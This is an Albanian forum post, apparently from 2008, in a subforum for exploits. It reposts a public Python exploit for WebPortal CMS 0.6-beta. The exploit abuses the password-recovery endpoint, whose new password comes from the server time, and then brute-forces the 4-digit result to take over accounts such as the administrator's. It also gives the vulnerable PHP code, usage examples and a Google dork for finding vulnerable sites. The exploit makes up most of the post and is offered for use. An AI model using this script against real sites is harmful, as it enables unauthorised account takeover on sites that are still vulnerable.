ForumPortaliGalleryPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi
...:::Meny Kryesore:::...
 Home
 Portali
 Forum
 Lista e Antarve
 Galeria
 Lajmet Flash
 Profili
 FAQ
 Testi I Dashuris
favoritos.gif Media & Muzika
 Telivizionet Live
 Video Klipe
 Ruzulltatet Sportive
 Mp3 Falass
 Mp3 RAP
 Kerkesa Muzikore
 Melodi Per Celular
icon_community.gif Argėtim-Zbavitje
 Video Humoristike
 Luani Lojra
 Dezing
 Poezi
 Gediche
 Argėtime
 Albumi Fotografik
 Tema tė Ndryshme
som_downloads.gif Shkarkime & Links
King-Rap Tolbar
Programe
Shkarko Scripte
Chat Programs
 Kėrko nė Forum
 Liderėt e forumit
 Ndihmė
 Kėrko
Moti Momental

Permbajta e ksaj faqe kerkon flash player per instalim kliko mbi ket tekst.


Futu nė chat

Top 5 softuerėt antivirus pėr 2008
HTML clipboard
Top 5 softuerėt antivirus pėr 2008

1. Bit Defender

2. Kaspersky

3. Eset NOD32

4. Trend Micro Antivirus

    plus AntiSpyware 

5. F-Secure Anti-Virus 

SMS Falas nga KING-RaP
Partnerėt
>>> AlBaZeMeR <<<

XoFaCe

->>Ks-MaX <<<---

->> KoSoVa.Li <<<---

 ->> Muzik-Anglisht <<<---

V.I.P Galeri

Top posters
kanuni
 
Xhebraili
 
vissari
 
El-Fuego
 
drini-89
 
RiRi
 
dj-baba
 
dosti
 
king
 
miri
 
Keywords
IP Addressa Juaj&Reklama
IP


Share | 
 

 WebPortal CMS 0.6-beta Remote Password Change Exploit

Shiko temėn e mėparshme Shiko temėn pasuese Shko poshtė 
AutoriMesazh
El-Fuego



Numri i postimeve : 159
Join date : 12/06/2008
Age : 104
Location : Peja Morder City

MesazhTitulli: WebPortal CMS 0.6-beta Remote Password Change Exploit   Thu Jun 12, 2008 8:33 pm

#!/usr/bin/python#=========================================== ================================================== ====# # ____ __________ __ ____ __ ## /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ ## | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ ## | | | \ | |/ \ \___| | /_____/ | || | ## |___|___| /\__| /______ /\___ >__| |___||__| ## \/\______| \/ \/ ##================================================ =================================================# # This is a Public Exploit. ## Date: 04/01/2008 [dd,mm,yyyy] ## ## !!!Happy New Year!!! ## ##================================================ =================================================# # WebPortal-0.6-beta Cms And Maybe Lower Remote Password Change Exploit ## ## Vendor: webportal.ivanoculmine.com ## Severity: Highest ## Author: The:Paradox ##================================================ =================================================# # This exploit works with Magic Quotes = On ##================================================ =================================================# # Proud To Be Italian. ##================================================ =================================================# """ Related Codes: actions.php; line 14:elseif ($_GET["action"] == "lostpass") { $newpass = date("is").substr($user, 1, 2); $result = db_query ("SELECT * FROM ".$prefix."users WHERE uname='".$_POST["user_name"]."';"); if (db_num_rows($result) > 0) { $utente = db_fetch_array ($result); db_query ("UPDATE ".$prefix."users SET pass='".md5($newpass)."' WHERE id='".$utente["id"]."';"); """#============================================== ================================================== =## Proof Of Concept / Bug Explanation: ## ## This vulnerability is in actions.php and make us able to change the password of a victim user. ## The page is a "Password Recovery Tool", that sends a new generated password to user's email. ## It does an Update query (after a vulnerable SQL injection mq = OFF xD) setting as "pass" ## the $newpass variable. Let's look the code. ## ## $newpass = date("is").substr($user, 1, 2); # # ## The newpassword is simply the date (minute+seconds) and the var $user taken trought ## register_globals (we can let it empty). ## So look at your clock, recover the password, and get administator rights ! =D ## # # If get the exactly server date is a problem for you, i have coded a little bruteforcer ## (the new password is a 4 number sequence). # # # #================================================= ================================================## Post Request to "Recover Password" : # # # # POST /webportal-0.6-beta/actions.php?action=lostpass user_name=[UserName] ## ##================================================ =================================================# # WebPortal cms is a very bugged platform. Some pages and functions don't work with the server ## configuration Register_globals = Off , A LOT of sql injections with Magic Quotes = Off, ## Full path disclosoures ecc. ## Whatever this one is the most critical ('cause works with Mq=ON). ## Maybe I'll public a sql injection mq=Off. ##================================================ =================================================# # Google Dork=> Realizzato utilizzando Web Portal ##================================================ =================================================# # Use this at your own risk. You are responsible for your own deeds. ##================================================ =================================================# # Python Exploit Starts ##================================================ =================================================# import httplib, urllib, sysfrom string import replaceprint "\n############################################### #"print " WebPortal-0.6-beta Cms And Maybe Lower "print " Remote Password Change Exploit "print " Date Bruteforcer "print " "print " Discovered By The:Paradox " print " "print " Usage: " print " python %s [Target] [Path] [Username] " % (sys.argv[0])print " " print " Example: " print " python %s 127.0.0.1 /WebPortal/ Admin " % (sys.argv[0])print " python %s www.host.com / Admin " % (sys.argv[0]) print " " print " " print "################################################\ n"if len(sys.argv)<=3: sys.exit()else: print "[.]Exploit Starting." port = "80"target = sys.argv[1]path = sys.argv[2]username = sys.argv[3] #Resetting Passwordconn = httplib.HTTPConnection(target,port)conn.request("P OST", path + "actions.php?action=lostpass", urllib.urlencode({'user_name': username}), {"Accept": "text/plain","Content-Type": "application/x-www-form-urlencoded"})response = conn.getresponse()print "[.]Resetting Password -->",response.status, response.reasonconn.close()#If 404 error: die.if response.status == 404: sys.exit("[-]Unable to reset Password. Failed, Exiting.")#Let's Brute.print "[.]Bruteforcer Starts. This may take long time."for i in range(10000,19999): conn = httplib.HTTPConnection(target,port) conn.request("POST", path + "actions.php", urllib.urlencode({'uname': username,'pass': replace(str(i), "1", "", 1),"action" : "login"}), {"Accept": "text/plain","Content-Type": "application/x-www-form-urlencoded"}) response = conn.getresponse() header = response.getheader("location") if header.find("index.php?error=not_logged") == -1: sys.exit("\n\n[+]Gotcha! Password is: " + replace(str(i), "1", "", 1) + "\n\n-=Paradox Got This One=-\n")print "[-]Not Found. Exploit Failed."# milw0rm.com [2008-01-04]
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
 
WebPortal CMS 0.6-beta Remote Password Change Exploit
Shiko temėn e mėparshme Shiko temėn pasuese Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: ..:: INFORMATIKA ::.. :: Exploits-
Kėrce tek: